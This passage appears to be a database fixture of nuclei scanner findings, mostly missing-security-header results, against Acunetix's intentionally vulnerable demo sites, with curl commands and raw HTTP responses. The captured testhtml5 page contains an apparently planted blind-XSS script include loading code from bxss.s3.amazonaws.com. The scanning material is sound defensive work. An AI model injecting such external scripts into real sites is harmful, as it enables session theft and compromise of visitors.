<h3>Links</h3> \n <ul> \n <li><a href="http://www.acunetix.com">Security art</a></li> \n\t <li><a href="https://www.acunetix.com/vulnerability-scanner/php-security-scanner/">PHP scanner</a></li>\n\t <li><a href="https://www.acunetix.com/blog/articles/prevent-sql-injection-vulnerabilities-in-php-applications/">PHP vuln help</a></li>\n\t <li><a href="http://www.eclectasy.com/Fractal-Explorer/index.html">Fractal Explorer</a></li> \n </ul> \n </div> \n <div id="advert"> \n <p>\n <object classid="clsid:D27CDB6E-AE6D-11cf-96B8-444553540000" codebase="http://download.macromedia.com/pub/shockwave/cabs/flash/swflash.cab#version=6,0,29,0" width="107" height="66">\n <param name="movie" value="Flash/add.swf">\n <param name=quality value=high>\n <embed src="Flash/add.swf" quality=high pluginspage="http://www.macromedia.com/shockwave/download/index.cgi?P1_Prod_Version=ShockwaveFlash" type="application/x-shockwave-flash" width="107" height="66"></embed>\n </object>\n </p>\n </div> \n</div> \n\n<!--end navbar --> \n<div id="siteInfo"> <a href="http://www.acunetix.com">About Us</a> | <a href="privacy.php">Privacy Policy</a> | <a href="mailto:wvs@acunetix.com">Contact Us</a> | <a href="/Mod_Rewrite_Shop/">Shop</a> | <a href="/hpp/">HTTP Parameter Pollution</a> | &copy;2019\n Acunetix Ltd \n</div> \n \n \n<br> \n<div style="background-color:lightgray;width:100%;text-align:center;font-size:12px;padding:1px">\n<p style="padding-left:5%;padding-right:5%"><b>Warning</b>: This is not a real shop. This is an example PHP application, which is intentionally vulnerable to web attacks. It is intended to help you test Acunetix. It also helps you understand how developer errors and bad configuration may let someone break into your website. You can use it to test other tools and your manual hacking skills as well. Tip: Look for potential SQL Injections, Cross-site Scripting (XSS), and Cross-site Request Forgery (CSRF), and more.</p>\n</div>\n</div>\n</body>\n<!-- InstanceEnd --></html>\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 442, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-frame-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2' 'http://testphp.vulnweb.com/.idea/.name'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea/.name", + "discovered_date": "2024-11-13T02:41:06.746Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea/.name HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_6) AppleWebKit/604.5.2 (KHTML, like Gecko) Version/9.1.2 Safari/604.5.2\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 6\r\nAccept-Ranges: bytes\r\nContent-Type: application/octet-stream\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nEtag: "4f911cd6-6"\r\nLast-Modified: Fri, 20 Apr 2012 08:22:46 GMT\r\nServer: nginx/1.19.0\r\n\r\nacuart", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 443, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 88, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "x-content-type-options", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0' 'http://testphp.vulnweb.com/.idea'", + "type": "http", + "http_url": "http://testphp.vulnweb.com/.idea", + "discovered_date": "2024-11-13T02:41:06.885Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /.idea HTTP/1.1\r\nHost: testphp.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36 XTPT/1.0\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:51 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>Index of /.idea/</title></head>\r\n<body>\r\n<h1>Index of /.idea/</h1><hr><pre><a href="../">../</a>\r\n<a href="scopes/">scopes/</a> 13-Nov-2012 13:29 -\r\n<a href="acuart.iml">acuart.iml</a> 20-Apr-2012 08:22 292\r\n<a href="encodings.xml">encodings.xml</a> 20-Apr-2012 08:22 171\r\n<a href="misc.xml">misc.xml</a> 20-Apr-2012 08:22 266\r\n<a href="modules.xml">modules.xml</a> 20-Apr-2012 08:22 275\r\n<a href="vcs.xml">vcs.xml</a> 20-Apr-2012 08:22 173\r\n<a href="workspace.xml">workspace.xml</a> 20-Apr-2012 08:23 12473\r\n</pre><hr></body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 444, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-resource-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61' 'http://testhtml5.vulnweb.com/logout'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:07.027Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /logout HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36 Edg/109.0.1518.61\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:50 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 445, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "strict-transport-security", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46' 'http://testhtml5.vulnweb.com'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com", + "discovered_date": "2024-11-13T02:41:07.177Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.85 Safari/537.36 Edg/90.0.818.46\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nAccess-Control-Allow-Origin: *\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<!DOCTYPE html>\n<html lang="en" xmlns="http://www.w3.org/1999/html" data-ng-app="itemsApp">\n<head>\n <meta charset="utf-8">\n <title>SecurityTweets - HTML5 test website for Acunetix Web Vulnerability Scanner</title>\n <meta name="viewport" content="width=device-width, initial-scale=1.0">\n <meta name="description" content="">\n <meta name="author" content="">\n\n <!-- Le styles -->\n <link href="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/css/bootstrap-combined.min.css" rel="stylesheet">\n <link href='http://fonts.googleapis.com/css?family=Lora:400,700,400italic,700italic' rel='stylesheet' type='text/css'>\n <link href="/static/css/style.css" rel="stylesheet">\n\n <link rel="icon" type="image/png" href="http://www.acunetix.com/favicon.ico">\n\n <style type="text/css">\n body {\n padding-top: 60px;\n padding-bottom: 40px;\n }\n .sidebar-nav {\n padding: 9px 0;\n }\n\n @media (max-width: 980px) {\n /* Enable use of floated navbar text */\n .navbar-text.pull-right {\n float: none;\n padding-left: 5px;\n padding-right: 5px;\n }\n }\n </style>\n</head>\n\n<body>\n\n<div class="navbar navbar-fixed-top">\n <div class="navbar-inner">\n <div class="container-fluid">\n <button type="button" class="btn btn-navbar" data-toggle="collapse" data-target=".nav-collapse">\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n <span class="icon-bar"></span>\n </button>\n <a class="brand" href="https://www.acunetix.com/"><img src="/static/img/logo2.png" alt="Acunetix website security">&nbsp;&nbsp;&nbsp;&nbsp;</a>\n <p class="navbar-text pull-left">\n Vulnerable HTML5 test website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a>.\n </p>\n\n <p class="navbar-text pull-right">\n \n <a href="#myModal" role="button" class="btn" data-toggle="modal">Login</a>\n \n </p>\n </div>\n </div>\n</div>\n\n<div class="container-fluid">\n <div class="row-fluid">\n <div class="span2">\n <div class="well sidebar-nav">\n <ul class="nav nav-list">\n <li class="nav-header">Views</li>\n <li id="popularLi" class="active"><a href="#/popular">Popular</a></li>\n <li><a href="#/latest">Latest</a></li>\n <li><a href="#/carousel">Carousel</a></li>\n <li><a href="#/archive">Archive</a></li>\n\n <li class="nav-header">Website</li>\n <li><a href="#/about">About</a></li>\n <li><a href="#/contact">Contact</a></li>\n\n <li class="nav-header">Acunetix</li>\n <li><a target="_blank" href="http://www.acunetix.com/">Website</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/html5-website-security/">HTML5 scanner</a></li>\n\t\t\t\t\t<li><a target="_blank" href="http://www.acunetix.com/vulnerability-scanner/crawling-html5-javascript-websites/">HTML5 vuln help</a></li>\n <li><a target="_blank" href="http://www.acunetix.com/blog/">Blog</a></li>\n <li><a target="_blank" href="http://www.facebook.com/Acunetix">Facebook</a></li>\n <li><a target="_blank" href="http://www.twitter.com/acunetix/">Twitter</a></li>\n </ul>\n </div><!--/.well -->\n </div><!--/span-->\n <div class="span10">\n <div class="row-fluid">\n <div ng-view></div>\n </div><!--/row-->\n </div><!--/span-->\n </div><!--/row-->\n\n <hr>\n\n <div class="row-fluid">\n <div class="pull-left" style="font-size: xx-small;" id="refId"></div>\n </div>\n\t\n\t<div style="background-color:lightgray;width:100%;text-align:center;font-size:14px">\n\t\t<p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This is an HTML5 application that is vulnerable by design. This is not a real collection of tweets. This application was created so that you can test your Acunetix, other tools, or your manual penetration testing skills. The application code is prone to attacks such as Cross-site Scripting (XSS) and XML External Entity (XXE). Links presented on this site have no affiliation to the site and are here only as samples.</p>\n\t</div>\n\n <footer>\n <p class="pull-left">&copy; Acunetix Ltd. 2019</p>\n </footer>\n\n</div><!--/.fluid-container-->\n\n\n<!-- Modal -->\n<div id="myModal" class="modal hide fade" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">\n <form class="modal-body" action="/login" method="POST" id="loginForm">\n <div class="modal-header">\n <button type="button" class="close" data-dismiss="modal" aria-hidden="true">×</button>\n <h3 id="myModalLabel">Login</h3>\n </div>\n <div class="modal-body">\n <div class="control-group">\n <!-- Username -->\n <label class="control-label" for="username">Username</label>\n <div class="controls">\n <input type="text" id="username" name="username" placeholder="" class="input-xlarge" value="admin">\n </div>\n </div>\n\n <div class="control-group">\n <!-- Password-->\n <label class="control-label" for="password">Password</label>\n <div class="controls">\n <input type="password" id="password" name="password" placeholder="" class="input-xlarge">\n </div>\n </div>\n\n <div class="control-group">\n <a href="#" class="btn" id="loginFormForgot">Forgot Pwd?</a>\n </div>\n\n </div>\n <div class="modal-footer">\n <button class="btn btn-primary" id="loginFormSubmit">Login</button>\n <button class="btn" data-dismiss="modal" aria-hidden="true">Close</button>\n </div>\n </form>\n</div>\n\n<!-- Le javascript\n================================================== -->\n<!-- Placed at the end of the document so the pages load faster -->\n<script src="http://code.jquery.com/jquery-1.9.1.min.js"></script>\n<script src="http://netdna.bootstrapcdn.com/twitter-bootstrap/2.3.1/js/bootstrap.min.js"></script>\n<script src="https://ajax.googleapis.com/ajax/libs/angularjs/1.0.6/angular.min.js"></script>\n\n<!-- App libs -->\n\n<script src="/static/app/app.js"></script>\n<script src="/static/app/libs/sessvars.js"></script>\n<script src="/static/app/post.js"></script>\n<script src="/static/app/controllers/controllers.js"></script>\n<script src="/static/app/services/itemsService.js"></script>\n<script src="http://bxss.s3.amazonaws.com/ad.js"></script>\n\n\n</body>\n</html>", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 446, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 82, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "clear-site-data", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15' 'http://testhtml5.vulnweb.com/static/css'", + "type": "http", + "http_url": "http://testhtml5.vulnweb.com/static/css", + "discovered_date": "2024-11-13T02:41:07.325Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET /static/css HTTP/1.1\r\nHost: testhtml5.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_6) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/13.1.2 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 403 Forbidden\r\nConnection: close\r\nTransfer-Encoding: chunked\r\nContent-Type: text/html\r\nDate: Wed, 13 Nov 2024 02:40:49 GMT\r\nServer: nginx/1.19.0\r\n\r\n<html>\r\n<head><title>403 Forbidden</title></head>\r\n<body>\r\n<center><h1>403 Forbidden</h1></center>\r\n<hr><center>nginx/1.19.0</center>\r\n</body>\r\n</html>\r\n", + "is_llm_used": false, + "tags": [ + 6, + 26, + 9 + ], + "cve_ids": [], + "cwe_ids": [], + "vuln_subscan_ids": [] + } +}, +{ + "model": "startScan.vulnerability", + "pk": 447, + "fields": { + "scan_history": 1, + "source": "nuclei", + "subdomain": 76, + "endpoint": null, + "target_domain": 1, + "template": "http/misconfiguration/http-missing-security-headers.yaml", + "template_url": "https://cloud.projectdiscovery.io/public/http-missing-security-headers", + "template_id": "http-missing-security-headers", + "matcher_name": "cross-origin-opener-policy", + "name": "HTTP Missing Security Headers", + "severity": 0, + "description": "This template searches for missing HTTP security headers. The impact of these missing headers can vary.\n", + "impact": null, + "remediation": null, + "extracted_results": "[]", + "references": null, + "cvss_metrics": "", + "cvss_score": null, + "curl_command": "curl -X 'GET' -H 'Accept: */*' -H 'Accept-Language: en' -H 'User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15' 'http://testaspnet.vulnweb.com'", + "type": "http", + "http_url": "http://testaspnet.vulnweb.com", + "discovered_date": "2024-11-13T02:41:07.465Z", + "open_status": true, + "hackerone_report_id": null, + "request": "GET / HTTP/1.1\r\nHost: testaspnet.vulnweb.com\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0.1 Safari/605.1.15\r\nConnection: close\r\nAccept: */*\r\nAccept-Language: en\r\nAccept-Encoding: gzip\r\n\r\n", + "response": "HTTP/1.1 200 OK\r\nConnection: close\r\nContent-Length: 14069\r\nCache-Control: private\r\nContent-Type: text/html; charset=utf-8\r\nDate: Wed, 13 Nov 2024 02:40:45 GMT\r\nServer: Microsoft-IIS/8.5\r\nSet-Cookie: ASP.NET_SessionId=vmit32btaeasjnawkbexxh55; path=/; HttpOnly\r\nX-Aspnet-Version: 2.0.50727\r\nX-Powered-By: ASP.NET\r\n\r\n\r\n<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN" >\r\n<HTML>\r\n\t<HEAD>\r\n\t\t<title>acublog news</title>\r\n\t\t<META http-equiv="Content-Type" content="text/html; charset=windows-1252">\r\n\t\t<meta content="Microsoft Visual Studio .NET 7.1" name="GENERATOR">\r\n\t\t<meta content="C#" name="CODE_LANGUAGE">\r\n\t\t<meta content="JavaScript" name="vs_defaultClientScript">\r\n\t\t<meta content="http://schemas.microsoft.com/intellisense/ie5" name="vs_targetSchema">\r\n\t\t<LINK href="styles.css" type="text/css" rel="stylesheet">\r\n\t</HEAD>\r\n\t<body>\r\n\t\t<form name="Form1" method="post" action="default.aspx" id="Form1">\r\n<div>\r\n<input type="hidden" name="__EVENTTARGET" id="__EVENTTARGET" value="" />\r\n<input type="hidden" name="__EVENTARGUMENT" id="__EVENTARGUMENT" value="" />\r\n<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTEwNTI0MjkwNQ9kFgICAQ9kFgICAQ9kFgQCAQ8WBB4EaHJlZgUKbG9naW4uYXNweB4JaW5uZXJodG1sBQVsb2dpbmQCAw8WBB8AZB4HVmlzaWJsZWhkZArjxDMCoNA8/4bzlRmUHIna4LG5" />\r\n</div>\r\n\r\n<script type="text/javascript">\r\n//<![CDATA[\r\nvar theForm = document.forms['Form1'];\r\nif (!theForm) {\r\n theForm = document.Form1;\r\n}\r\nfunction __doPostBack(eventTarget, eventArgument) {\r\n if (!theForm.onsubmit || (theForm.onsubmit() != false)) {\r\n theForm.__EVENTTARGET.value = eventTarget;\r\n theForm.__EVENTARGUMENT.value = eventArgument;\r\n theForm.submit();\r\n }\r\n}\r\n//]]>\r\n</script>\r\n\r\n\r\n<div>\r\n\r\n\t<input type="hidden" name="__VIEWSTATEGENERATOR" id="__VIEWSTATEGENERATOR" value="CA0B0334" />\r\n\t<input type="hidden" name="__EVENTVALIDATION" id="__EVENTVALIDATION" value="/wEWVwLpus/wCAKv3NmgDwKB48+iAgK20qX9DwK20qX9DwK20tmRBwK20tmRBwK20o35BQK20o35BQK20qGcDQK20qGcDQKL+bMFAov5swUCi/mn2AkCi/mn2AkCi/nb/AICi/nb/AICi/nPkwoCi/nPkwoCi/njtgMCi/njtgMCi/mXzQwCi/mXzQwCi/mL4AUCi/mL4AUCi/m/hw0Ci/m/hw0Ci/mT7AsCi/mT7AsCi/mHgwMCi/mHgwMCvJPzxAkCvJPzxAkCvJPnmwECvJPnmwECvJObvgoCvJObvgoCvJOP1QMCvJOP1QMCvJOj6AwCvJOj6AwCvJPXjAQCvJPXjAQCvJPLow0CvJPLow0CvJP/xgYCvJP/xgYCvJPTrwMCvJPTrwMCvJPHwgwCvJPHwgwCkbrR6w8CkbrR6w8CkbrFjgcCkbrFjgcCkbr5JQKRuvklApG67fgJApG67fgJApG6gZ8BApG6gZ8BApG6tbIKApG6tbIKApG6qckDApG6qckDApG63e0MApG63e0MApG6sdUJApG6sdUJApG6pegCApG6pegCAtTZ5J4HAtTZ5J4HAtTZmDUC1NmYNQLU2YzICQLU2YzICQLU2aDvAgLU2aDvAgLU2dSDCgLU2dSDCgLU2cimAwLU2cimAwLU2fz9DALU2fz9DALU2ZCQBALU2ZCQBBM7QfLxs46Xr8rthEeGdU4fr+Ig" />\r\n</div>\r\n\t\t\t\r\n<TABLE id="Table1" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD style="COLOR: #e6dccf" bgColor="#806640" height="75"><a href="https://www.acunetix.com/"><IMG src="images/logo_acunetix.gif" align="absMiddle" border="0" alt="Acunetix website security"></a></TD>\r\n\t\t<TD style="FONT-WEIGHT: bold; FONT-SIZE: small; COLOR: #e6dccf" align="right" bgColor="#806640"\r\n\t\t\theight="75">Test Website for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></TD>\r\n\t</TR>\r\n</TABLE>\r\n<TABLE id="Table2" cellSpacing="0" cellPadding="5" width="790" align="center" border="0">\r\n\t<TR>\r\n\t\t<TD class="MenuBar" style="BORDER-LEFT: #806040 1px solid"><A class="menu" title="About" href="about.aspx">about</A>\r\n\t\t\t<A class="menu" title="Latest news" href="default.aspx">news</A> <a href="login.aspx" id="Mainmenu2_lnkLog" class="menu" name="lnkLog">login</a> <a href="Signup.aspx" id="Mainmenu2_lnkSignup" class="menu" name="lnkSignup">\r\n\t\t\t\tsignup</a> <A class="menu" title="Network scanner" href="https://www.acunetix.com/vulnerability-scanner/network-vulnerability-scanner/">network scanner</A>\r\n\t\t\t\t<A class="menu" title="Network vuln help" href="https://www.acunetix.com/blog/articles/network-vulnerability-assessment-gotchas-avoid/">network vuln help</A>\r\n\t\t</TD>\r\n\t\t<td class="MenuBar" align="right" width="50px">\r\n\t\t\t<A href="rssFeed.aspx"><IMG src="images/rss.gif" border="0"></A>\r\n\t\t</td>\r\n\t</TR>\r\n</TABLE>\r\n\r\n\t\t\t<TABLE id="Table1" cellSpacing="0" 